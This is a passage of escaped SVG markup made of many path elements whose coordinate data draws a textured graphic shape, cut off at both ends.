d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path 